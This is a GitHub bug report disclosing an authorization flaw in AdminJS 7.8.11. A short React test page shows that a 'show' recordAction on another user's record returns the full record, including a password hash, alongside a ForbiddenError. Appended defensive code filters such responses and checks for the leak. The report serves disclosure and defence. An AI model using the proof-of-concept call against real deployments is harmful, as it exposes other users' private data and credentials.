
[Bug]: Security. Get someone else's user #1706

@pogudin-sergey

Description


Contact Details

No response

What happened?

By logging in as any user, you can get the data of other users, even if it is prohibited by the resource.

This code returns any user inside the error object:

const result = await api.recordAction({
        resourceId: 'Users',
        actionName: 'show',
        recordId: '1',
});

Example:

Resource

import { ResourceWithOptions } from 'adminjs';
import { User } from '../models/index.js';

const UserResource: ResourceWithOptions = {
  resource: User,
  options: {
    actions: {
      new: {
        isAccessible: false,
      },
      delete: {
        isAccessible: false,
      },
      bulkDelete: {
        isAccessible: false,
      },
      list: {
        isAccessible: false,
      },
      edit: {
        isAccessible: false,
      },
      show: {
        isAccessible: false,
      },
      search: {
        isAccessible: false,
      },
    },
  },
}

export { UserResource }

Test page

import React, { useEffect } from 'react';
import { useSelector } from 'react-redux';
import { ApiClient, ReduxState } from 'adminjs';

const api = new ApiClient();

export const Page2: React.FC = () => {
  const session = useSelector((state: ReduxState) => state.session);

  async function test() {
    console.log('Current user', session);

    const result = await api.recordAction({
      resourceId: 'Users',
      actionName: 'show',
      recordId: '1',
    });
    result.data.record.id ? console.error('SHOW ALIEN: FAIL', result) : console.log('SHOW ALIEN: OK');
  }

  useEffect(() => {
    test();
  }, []);

  return (<></>)
}

export default Page2

Result

// Current user
{
    "email": "user2",
    "id": 2,
    "name": "Test user 2",
    "theme": "light"
}

// api.recordAction result. Result is truncated
{
    "data": {
        "record": {
            "params": {
                "id": 1,
                "email": "user1",
                "password": "28a53d1feb12433aa577d60c0cadd27e",
                "name": "Admin",
                "theme": "dark",
                "createdAt": "2023-11-17T16:56:33.555Z",
                "updatedAt": "2024-08-26T18:37:47.819Z"
            },
            "populated": {},
            "baseError": {
                "message": "forbiddenError",
                "type": "ForbiddenError"
            },
            "errors": {},
            "id": 1,
            "recordActions": [],
            "bulkActions": []
        },
        "records": [],
        "notice": {
            "message": "forbiddenError",
            "type": "error"
        }
    },
    "status": 200,
    "statusText": "OK"
}

Result is 'forbiddenError', but record 1 is returned!

Bug prevalence

always

AdminJS dependencies version

7.8.11

What browsers do you see the problem on?

No response

Relevant log output

No response

Relevant code that's giving you issues

No response
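A response filter and a regression check for the leak shape reported above, added here as example code that is not part of AdminJS or of the reporter's post; the helper names (`stripForbiddenRecord`, `leaksRecordData`) and the sample payload are constructed assumptions mirroring the truncated response in the report.

```javascript
// Added example, not AdminJS code. Works on the response shape shown in the
// report: a record whose baseError.type is 'ForbiddenError' must not carry
// params, populated data, or an id back to the client.

const isForbidden = (rec) =>
  Boolean(rec && rec.baseError && rec.baseError.type === 'ForbiddenError');

// Return a copy of the response in which every forbidden record has its
// data fields removed while the error information is kept intact.
function stripForbiddenRecord(response) {
  const data = response.data || {};
  const out = { ...response, data: { ...data } };
  const scrub = (rec) => {
    const { params, populated, id, ...rest } = rec; // dropped on purpose
    return { ...rest, params: {}, populated: {} };
  };
  if (isForbidden(data.record)) out.data.record = scrub(data.record);
  if (Array.isArray(data.records)) {
    out.data.records = data.records.map((r) => (isForbidden(r) ? scrub(r) : r));
  }
  return out;
}

// Regression check: true when a ForbiddenError record still exposes data.
function leaksRecordData(response) {
  const data = response.data || {};
  const recs = [data.record, ...(Array.isArray(data.records) ? data.records : [])];
  return recs.some(
    (r) => isForbidden(r) && (Object.keys(r.params || {}).length > 0 || r.id !== undefined)
  );
}

// Constructed sample mirroring the report (hash value is a placeholder).
const sample = {
  data: {
    record: {
      params: { id: 1, email: 'user1', password: '<hash placeholder>', name: 'Admin' },
      populated: {},
      baseError: { message: 'forbiddenError', type: 'ForbiddenError' },
      errors: {}, id: 1, recordActions: [], bulkActions: [],
    },
    records: [],
    notice: { message: 'forbiddenError', type: 'error' },
  },
  status: 200, statusText: 'OK',
};
```

Running `leaksRecordData` against responses in an integration test catches the behaviour in this report, and `stripForbiddenRecord` shows what a fixed response should look like.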
